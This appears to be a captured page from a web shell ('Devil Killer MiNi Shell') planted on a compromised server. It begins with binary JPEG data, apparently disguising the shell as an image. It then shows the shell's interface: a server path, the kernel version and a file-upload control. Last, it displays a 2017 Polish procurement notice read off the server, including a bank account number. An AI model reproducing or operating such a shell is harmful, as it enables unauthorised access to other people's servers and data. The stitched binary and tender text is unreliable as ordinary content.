JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/17003_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-400><biuletyn>2017</biuletyn><pozycja>17003</pozycja><data_publikacji>2017-01-31</data_publikacji><nazwa>Agencja Rozwoju Regionalnego "ARLEG" S.A.</nazwa><ulica>ul. Rataja</ulica><nr_domu>26</nr_domu><nr_miesz></nr_miesz><miejscowosc>Legnica</miejscowosc><kod_poczt>59220 </kod_poczt><panstwo>Polska</panstwo><wojewodztwo>dolnośląskie</wojewodztwo><tel>0-76 8622777</tel><fax>0-76 8620968</fax><email>arleg@arleg.eu</email><internet></internet><adres_strony_internetowej_narzedzia></adres_strony_internetowej_narzedzia><adres_strony_url>www.arleg.eu</adres_strony_url><podmiot2c>Dolnośląska Agencja Współpracy Gospodarczej Sp. z o.o. z siedzibą we Wrocławiu (50-151) przy ul. Kotlarskiej 42, NIP 899-251-47-80</podmiot2c><regon>39002934600000</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o zamówieniu</ogloszenie><czy_obowiazkowa>T</czy_obowiazkowa><zamieszczanie_obowiazkowe>T</zamieszczanie_obowiazkowe><nazwa_projektu_programu>Partnerstwo na rzecz rozwoju dolnośląskich MMŚP i ich pracowników</nazwa_projektu_programu><czy_ubiegac_zaklady_pracy /><minimalny_procent_zatrudnienia></minimalny_procent_zatrudnienia><czy_przeprowadza_centralny_zamawiajacy /><czy_przeprowadza_podmiot_zamawiajacy_powierzyl>T</czy_przeprowadza_podmiot_zamawiajacy_powierzyl><zamawiajacy_powierzyl>Postępowanie prowadzone jest przez Agencję Rozwoju Regionalnego ARLEG S.A., 59-220 Legnica, ul. Macieja Rataja 26 działającego w imieniu własnym i na rzecz Partnerów oraz na rzecz własną i Partnerów:
Dolnośląska Agencja Współpracy Gospodarczej Sp. z o.o. z siedzibą we Wrocławiu (50-151) przy ul. Kotlarskiej 42,
Karkonoska Agencja Rozwoju Regionalnego S.A. z siedzibą w Jeleniej Górze (58-500) przy ul. 1 Maja 27,
Wrocławska Agencja Rozwoju Regionalnego S.A. z siedzibą we Wrocławiu (52-437) przy ul. Karmelkowej 29,
Dolnośląski Park Innowacji i Nauki S.A. z siedzibą we Wrocławiu (52-426) przy ul. Eugeniusza Kwiatkowskiego 4,
Agencja Rozwoju Regionalnego AGROREG S.A. z siedzibą w Nowej Rudzie (57-402) przy ul. Kłodzkiej 27. 
WW.podmioty zawarły w dniu 13-12-2016 r porozumienie dotyczące przeprowadzenia niniejszego postępowania przez  Agencję Rozwoju Regionalnego ARLEG S.A. Osobą do kontaktów (porozumiewania się z Wykonawcami) jest Pani Joanna Milcarz - wskazana przez Zamawiającego w rozdziale VIII siwz (adres poczty elektronicznej: arleg@arleg.eu). W związku z powyższym w niniejszej Sekcji ogłoszenia nie zostały wskazane inne osoby i adresy do kontaktów.  
</zamawiajacy_powierzyl><czy_przeprowadza_wapolnie>T</czy_przeprowadza_wapolnie><przeprowadza_wapolnie_podmiot1></przeprowadza_wapolnie_podmiot1><przeprowadza_wapolnie_podmiot2></przeprowadza_wapolnie_podmiot2><czy_przeprowadza_zamawiajacy_z_eu /><postepowanie_wspolne_tresc></postepowanie_wspolne_tresc><informacje_dodatkowe_zamawiajacy></informacje_dodatkowe_zamawiajacy><dotyczy>1</dotyczy><adres_dyn_zak></adres_dyn_zak><rodzaj_zam>inny: </rodzaj_zam><wspolne_udzielanie_zamowienia>Postępowanie prowadzone jest przez Agencję Rozwoju Regionalnego ARLEG S.A., 59-220 Legnica, ul. Macieja Rataja 26 działającego w imieniu własnym i na rzecz Partnerów oraz na rzecz własną i Partnerów. Za przeprowadzenie postępowania odpowiedzialna jest Agencja Rozwoju Regionalnego ARLEG S.A. Zmawiający i każdy z Partnerów Projektu zawrze z Wykonawcą/Wykonawcami odrębne umowy w zakresie dostaw w obrębie przedmiotu zamówienia każdego z dwóch Pakietów (części postępowania). Przy czym dokładny podział asortymentowy określony został w Załączniku 2 A do siwz.   </wspolne_udzielanie_zamowienia><czy_dostep_dokumentow_zamowienia>T</czy_dostep_dokumentow_zamowienia><dostep_dokumentow_zamowienia>www.arleg.eu</dostep_dokumentow_zamowienia><czy_zamieszczona_bedzie_specyfikacja>T</czy_zamieszczona_bedzie_specyfikacja><zamieszczona_bedzie_specyfikacja>www.areg.eu</zamieszczona_bedzie_specyfikacja><czy_dostep_do_dokumentow_ograniczony /><czy_wymagane_przeslanie_ofert>T</czy_wymagane_przeslanie_ofert><wymagane_przeslanie_ofert_inny>w formie pisemnej</wymagane_przeslanie_ofert_inny><czy_podzielone_na_czesci>T</czy_podzielone_na_czesci><oferty_lub_wnioski>Wszystkie</oferty_lub_wnioski><maksymalna_liczba_czesci></maksymalna_liczba_czesci><zastrezega_prawo_grup_czesci></zastrezega_prawo_grup_czesci><maksymalna_liczba_czesci_jednemu_wykonawcy></maksymalna_liczba_czesci_jednemu_wykonawcy><dostep_do_dokumentow_ograniczony></dostep_do_dokumentow_ograniczony><czy_oferty_wnioski_dostepne /><oferty_wnioski_dostepne></oferty_wnioski_dostepne><czy_dopuszczone_wymagane_przeslanie_ofert /><dopuszczone_wymagane_przeslanie_ofert_inny></dopuszczone_wymagane_przeslanie_ofert_inny><dopuszczone_wymagane_przeslanie_ofert_adres>Agencja Rozwoju Regionalnego ARLEG S.A., 59-220 Legnica, ul. Macieja Rataja 26 </dopuszczone_wymagane_przeslanie_ofert_adres><czy_komunikacja_elektroniczna_wymaga /><komunikacja_elektroniczna_wymaga></komunikacja_elektroniczna_wymaga><wymagania_dotyczace_rejestracji_wyk_aukcja></wymagania_dotyczace_rejestracji_wyk_aukcja><nazwa_zamowienia>Dostawa infrastruktury informatycznej w ramach Regionalnego Programu Operacyjnego Województwa Dolnośląskiego 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego 
dla projektu pn. Partnerstwo na rzecz rozwoju dolnośląskich MMŚP i ich pracowników. Działanie 8.6 Zwiększenie konkurencyjności przedsiębiorstw i przedsiębiorców z sektora MMŚP
</nazwa_zamowienia><numer_referencyjny></numer_referencyjny><czy_dialog_techniczny /><rodz_zam>D</rodz_zam><przedmiot_zam>1. Przedmiotem zamówienia jest jednorazowa dostawa na rzecz Zamawiającego i Partnerów asortymentu związanego z infrastrukturą informatyczną pogrupowanego w dwa odrębne Pakiety obejmujące:
1) Pakiet 1 - 6 sztuk serwerów, 6 sztuk UPS oraz 6 sztuk Firewall wraz z oprogramowaniem,
2) Pakiet 2 - 24 sztuki notebooków wraz z oprogramowaniem i 6 sztuk monitorów z urządzeniami peryferyjnymi, 
szczegółowo opisanych w Formularzu asortymentowo-cenowym (załączniku 2A), stanowiącym integralną część specyfikacji istotnych warunków zamówienia.

2. Warunki dotyczące wykonywania zamówienia opisane zostały również w projektach umów w Rozdziale XVII siwz.</przedmiot_zam><cpv1c>32420000-3</cpv1c><cpv2c>48820000-2</cpv2c><okres2c>21</okres2c><szacunkowa_wart_zam_calosc></szacunkowa_wart_zam_calosc><waluta_calosc></waluta_calosc><czy_przewiduje_udzielenie_zamowien_67>N</czy_przewiduje_udzielenie_zamowien_67><czy_przewiduje_udzielenie_zamowien_67_tekst></czy_przewiduje_udzielenie_zamowien_67_tekst><czy_czesci /><czy_czesci_wymaga /><ilosc_czesci></ilosc_czesci><ilosc_czesci_max></ilosc_czesci_max><czy_wariant /><czy_uzup /><zam_uzupelniajace></zam_uzupelniajace><czas>
        O
      </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_zak></data_zak><ii_2_lub_temp></ii_2_lub_temp><informacje_na_temat_katalogow>Uwaga: Zamówienie w ramach umowy należy zrealizować w terminie nie dłuższym niż 21 dni od zawarcia umowy (w zakresie Pakietu 1 istnieje możliwość uzyskania punktów dodatkowych w przypadku wykonania dostawy w ciągu 14 dni od zawarcia umowy). Wskazane w niniejszym ogłoszeniu w Sekcji IV.2.2) Kryteria dotyczą Pakietu 1; kryteria dotyczące Pakietu 2 określone zostały w Załączniku do ogłoszenia (informacji o ofertach częściowych niniejszego ogłoszenia w zakresie Pakietu 2).
</informacje_na_temat_katalogow><okreslenie_warunkow>Zamawiający nie formułuje wymagań w zakresie warunków udziału w postępowaniu.</okreslenie_warunkow><informacje_dodatkowe_okreslenie_warunkow></informacje_dodatkowe_okreslenie_warunkow><sytuacja_finansowa_okreslenie_warunkow>Zamawiający nie formułuje wymagań w zakresie warunków udziału w postępowaniu.</sytuacja_finansowa_okreslenie_warunkow><sytuacja_finansowa_informacje_dodatkowe></sytuacja_finansowa_informacje_dodatkowe><zdolnosc_techniczna_okreslenie_warunkow>Zamawiający nie formułuje wymagań w zakresie warunków udziału w postępowaniu.</zdolnosc_techniczna_okreslenie_warunkow><zdolnosc_techniczna_informacje_dodatkowe></zdolnosc_techniczna_informacje_dodatkowe><czy_zdolnosc_techniczna_wymaga_wykonawcow /><czy_zamawiajacy_przewiduje_wykluczenie>T</czy_zamawiajacy_przewiduje_wykluczenie><art_24_ust_5_pkt_1>T</art_24_ust_5_pkt_1><art_24_ust_5_pkt_2 /><art_24_ust_5_pkt_3 /><art_24_ust_5_pkt_4 /><art_24_ust_5_pkt_5 /><art_24_ust_5_pkt_6 /><art_24_ust_5_pkt_7 /><art_24_ust_5_pkt_8 /><czy_oswiadczenie_niepodleganiu_wykluczenia>T</czy_oswiadczenie_niepodleganiu_wykluczenia><czy_oswiadczenie_spelnienie_kryteriow /><zaliczka /><uprawnienie></uprawnienie><wiedza></wiedza><potencjal></potencjal><zdolne></zdolne><sytuacja></sytuacja><sprawozdanie_calosc></sprawozdanie_calosc><lata_obrotowe></lata_obrotowe><oswiadczenie_potwierdzenia_1 /><oswiadczenie_potwierdzenia_2 /><oswiadczenie_potwierdzenia_3 /><oswiadczenie_potwierdzenia_4 /><oswiadczenie_potwierdzenia_5 /><oswiadczenie_potwierdzenia_6 /><oswiadczenie_potwierdzenia_7 /><oswiadczenie_potwierdzenia_8 /><oswiadczenie_potwierdzenia_9 /><oswiadczenie_potwierdzenia_10 /><oswiadczenie_wykluczenia_1 /><oswiadczenie_wykluczenia_2 /><oswiadczenie_wykluczenia_3 /><oswiadczenie_wykluczenia_4 /><oswiadczenie_wykluczenia_5 /><oswiadczenie_wykluczenia_6 /><oswiadczenie_wykluczenia_7 /><dok_podm_zag_1 /><dok_podm_zag_2 /><dok_podm_zag_3 /><dok_podm_zag_4 /><dok_potw_1 /><dok_potw_2 /><dok_potw_3 /><dok_potw_4 /><dok_potw_5 /><dok_potw_6 /><inne_dok_potw></inne_dok_potw><inne_dokumenty></inne_dokumenty><niepelnosprawne /><oswiadczenie_przedlozyc /><inne_dokumenty></inne_dokumenty><wykaz_dokumentow_zaswiadczen>Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art 24 ust. 5 pkt.1 uPzp.
Uwaga: Dotyczy podmiotów zarejestrowanych w Polsce – Zamawiający informuje, że w związku z faktem, iż ma możliwość samodzielnego  pozyskania ww. dokumentów obowiązujących w polskim porządku prawnym 
w postaci elektronicznej, tj. informacji z Krajowego Rejestru Sądowego (art. 4 ustawy z dnia 20 sierpnia 1997 r. – 
o Krajowym Rejestrze Sądowym (t.j. z 2016 r. poz. 687) oraz informacji z Centralnej Ewidencji Działalności Gospodarczej  (art. 38 ustawy z dnia 2 lipca 2004 r. – o swobodzie działalności gospodarczej (Dz.U. z 2015 r., poz. 584 ze zm.) – nie będzie wzywał Wykonawców do ich złożenia. 
W przypadku podmiotów zarejestrowanych poza granicami Polski – zgodnie z §10 rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy 
w postępowaniu o udzielenie zamówienia publicznego (Dz.U z 2016 r., poz. 1126) Wykonawca będzie miał możliwość złożenia dokumentu bądź wskazania Zamawiającemu na ogólnie dostępne i elektronicznie prowadzone bazy, z których bezpłatnie będzie można pozyskać dokumenty potwierdzające sytuację podmiotową Wykonawcy ww. zakresie. Jeżeli oświadczenia i dokumenty, o których mowa w zdaniu pierwszym są sporządzone w języku obcym – Wykonawca zobowiązany jest do ich tłumaczenia na język polski.
</wykaz_dokumentow_zaswiadczen><zakresie_warunkow_udzialu>Nie dotyczy.</zakresie_warunkow_udzialu><zakresie_kryteriow_selekcji></zakresie_kryteriow_selekcji><inne_dokumenty_niewymienione>1. W celu wykazania braku podstaw do wykluczenia, Wykonawcy muszą złożyć wraz z ofertą (którą stanowi formularz ofertowy - druk oferty stanowiący załącznik nr 2 do siwz wraz z załącznikiem 2A – formularzem asortymentowo- cenowym): 
1) aktualne na dzień składania ofert oświadczenie w zakresie wskazanym przez Zamawiającego w załączniku 1 do siwz; informacje zawarte w oświadczeniu stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu.
2) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o którym mowa w ppkt. 1) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te mają potwierdzać brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wskazuje brak podstaw wykluczenia 
z postępowania.
2) pełnomocnictwo do reprezentowania Wykonawcy /dla Wykonawców występujących wspólnie, o ile ofertę składa pełnomocnik.
2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy złożyć z ofertą w formie pisemnej (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza).
3. Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie informacji, o której mowa w art. 86 ust. 5 uPzp, jest zobowiązany do przekazania Zamawiającemu oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art.24 ust. 1 pkt 23 uPzp. Wraz ze złożeniem oświadczenia o przynależności do tej samej grupy kapitałowej Wykonawca może przedstawić  dowody potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców – oświadczenie zobligowany będzie złożyć każdy z Wykonawców wspólnie ubiegających się o zamówienie. [Prosimy nie składać z ofertą. (Wzór oświadczenia zostanie udostępniony 
na stronie internetowej Zamawiającego wraz z informacją opublikowaną na podstawie art. 92 ust. 5)]

Uwaga: Zamawiający nie wymaga złożenia oświadczeni o spełnianiu warunków udziału w postępowaniu, gdyż nie sformułował wymagań w zakresie warunków udziału w postępowaniu.
</inne_dokumenty_niewymienione><wykaz_potwierdzenie_okolicznosci>Nie dotyczy.</wykaz_potwierdzenie_okolicznosci><wadium>1. Wykonawca przystępujący do niniejszego postępowania jest obowiązany wnieść wadium na czas związania ofertą. 

2. Oferta musi być zabezpieczona wadium o wartości odpowiednio:
1)  3.400 zł – dotyczy Pakietu 1;
2)  2.400 zł – dotyczy Pakietu 2.

3. Wymagane wadium musi być wniesione przed upływem terminu składania ofert, tj. do dnia 10 lutego 2017 r. 
do godziny 11.00.

4. Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu, 
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,                    
d) gwarancjach ubezpieczeniowych, 
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620). 

5. Przy wnoszeniu wadium Wykonawca winien powołać się na nazwę niniejszego postępowania: „Dostawa infrastruktury informatycznej w ramach Regionalnego Programu Operacyjnego Województwa Dolnośląskiego 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego dla projektu pn. Partnerstwo na rzecz rozwoju MMŚP i ich pracowników. Działanie 8.6 Zwiększenie konkurencyjności przedsiębiorstw i przedsiębiorców MMŚP”.

6. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: Agencji Rozwoju Regionalnego ARLEG S.A., 59-220 Legnica, ul. Macieja Rataja 26, nr rachunku: 91 1050 1908 1000 0023 9999 2201.
Uwaga: wniesienie wadium w pieniądzu winno nastąpić w terminie gwarantującym wpływ pieniędzy na konto Zamawiającego najpóźniej w dniu i do godziny składania oferty.

7. W przypadku wadium wniesionego w formie gwarancji bankowej lub ubezpieczeniowej, udzielona gwarancja musi być gwarancją samoistną, nieodwołalną, bezwarunkową i płatną na pierwsze żądanie, bez konieczności przedkładania jakichkolwiek dodatkowych dokumentów i winna zawierać co najmniej poniższe elementy (lub zapisy równoważne):
a) nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz  wskazanie siedziby,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją,   
c) kwotę gwarancji,
d) termin ważności gwarancji,
e) zobowiązanie gwaranta do „zapłacenia” kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż wykonawca, którego ofertę wybrano:
1) odmówił podpisania umowy w sprawie zamówienia publicznego  na warunkach określonych w ofercie,
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,

8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a uPzp, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 uPzp, oświadczenia, o którym mowa w art. 25a ust. 1 uPzp, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 uPzp, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej. 
9. Postanowienia, o których mowa w pkt 7 odnoszą się również do poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że  poręczenie  kasy jest zawsze poręczeniem pieniężnym oraz do poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).

10. W przypadku wadium wniesionego w formie innej niż pieniężna - oryginał dowodu wniesienia wadium 
należy złożyć w odrębnej kopercie/opakowaniu: Agencja Rozwoju Regionalnego ARLEG S.A., 59-220 Legnica, ul. Macieja Rataja 26 Sekretariat, do dnia 10 lutego 2017 r., do godz. 11.00.
</wadium><czy_wadium>T</czy_wadium><przewiduje_udzielenie_zaliczek></przewiduje_udzielenie_zaliczek><czy_przewiduje_udzielenie_zaliczek>N</czy_przewiduje_udzielenie_zaliczek><zlozenie_katalogow_elektronicznych_informacje_dodatkowe></zlozenie_katalogow_elektronicznych_informacje_dodatkowe><czy_dopuszcza_zlozenie_katalogow_elektronicznych>N</czy_dopuszcza_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_katalogow_elektronicznych>N</czy_wymaga_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_oferty_wariantowej>N</czy_wymaga_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej>N</czy_dopuszcza_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej /><liczba_wyk></liczba_wyk><minimalna_liczba_wykonawcow></minimalna_liczba_wykonawcow><maksymalna_liczba_wykonawcow></maksymalna_liczba_wykonawcow><wybor_wyk></wybor_wyk><kod_trybu>PN</kod_trybu><z_kim_umowa_bedzie_zawarta /><czy_ograniczenie_liczby_uczestnikow /><ograniczenie_liczby_uczestnikow></ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow_informacje_dodatkowe></ograniczenie_liczby_uczestnikow_informacje_dodatkowe><czy_obejmuje_ustanowienie /><obejmuje_ustanowienie></obejmuje_ustanowienie><obejmuje_ustanowienie_informacje_dodatkowe></obejmuje_ustanowienie_informacje_dodatkowe><czy_pobranie_umowy_ramowej_dynamicznego_katalogow /><czy_umowy_ramowej_dynamicznego_katalogow /><czy_zmiana_umowy>T</czy_zmiana_umowy><zmiana_umowy>Dotyczy Pakietu 1 i Pakietu 2: 1. Dopuszcza się zmianę umowy w zakresie: 
a) zmiany umowy o dofinansowanie projektu w ramach Regionalnego Programu Operacyjnego Województwa Dolnośląskiego na lata 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego RPDS.08.06.00-02-0004/16-00, a w szczególności w razie zmiany harmonogramu projektu,
b) pojawienia się na rynku urządzeń nowszej generacji, o lepszych parametrach i pozwalających na zaoszczędzenie kosztów eksploatacji pod warunkiem, że takie zmiany nie spowodują zwiększenia łącznego wynagrodzenia brutto określonego w § 4 ust. 1.
2. Dopuszcza się również zmianę umowy w zakresie wynagrodzenia w przypadku zmiany powszechnie obowiązujących przepisów prawa podatkowego w takim zakresie, aby w razie wzrostu obciążeń podatkowych 
(VAT i akcyza nie uległa wzrostowi kwota netto wynagrodzenia, zaś w przypadku obniżenia należności podatkowych (VAT i akcyza) aby kwota brutto została zmniejszona o równowartość zmniejszenia należności podatkowych Wykonawcy.
</zmiana_umowy><kryt_cena></kryt_cena><kryt_0>Cena</kryt_0><kryt_0p>60</kryt_0p><czy_aukcja>N</czy_aukcja><aukcja_dod_info></aukcja_dod_info><elementy_aukcji_elektronicznej></elementy_aukcji_elektronicznej><ograniczenia_do_przedstawianych_wartosci></ograniczenia_do_przedstawianych_wartosci><informaje_udostepnione_wykonawcom></informaje_udostepnione_wykonawcom><informaje_przebiegu_aukcji></informaje_przebiegu_aukcji><warunki_do_licytacji></warunki_do_licytacji><wykorzystanie_sprzetu_elektronicznego></wykorzystanie_sprzetu_elektronicznego><spec_www></spec_www><spec_war></spec_war><potrzeb></potrzeb><wys_nagrod></wys_nagrod><harm_diag_kon></harm_diag_kon><pod_kon_etapy></pod_kon_etapy><data_skl>10/02/2017</data_skl><godz_skl>11:00</godz_skl><miejsce></miejsce><IV_4_4_jezyki>polski</IV_4_4_jezyki><termin>
        on
      </termin><okres_liczba_dni>30</okres_liczba_dni><okres_data_do></okres_data_do><le_adres_aukcja></le_adres_aukcja><le_adres_opis></le_adres_opis><le_wymagania></le_wymagania><le_postapien></le_postapien><licytacja_etapy></licytacja_etapy><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nast /><licytacja_etapya></licytacja_etapya><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nasta /><warunki_zamkniecia_aukcji></warunki_zamkniecia_aukcji><zastosowanie_procedury_pzp>T</zastosowanie_procedury_pzp><IV_3_1_minimalne_wymagania></IV_3_1_minimalne_wymagania><IV_3_1_Przewidziane_jest_zastrzezenie /><IV_3_1_Przewidziany_podzial /><IV_3_1_etapy_negocjacji></IV_3_1_etapy_negocjacji><IV_3_1_dodatkowe_informacje></IV_3_1_dodatkowe_informacje><IV_3_2_opis_potrzeb></IV_3_2_opis_potrzeb><IV_3_2_informacja_wysokosc_nagrod></IV_3_2_informacja_wysokosc_nagrod><IV_3_2_wstepny_harmonogram></IV_3_2_wstepny_harmonogram><IV_3_2_PodzialDialogu 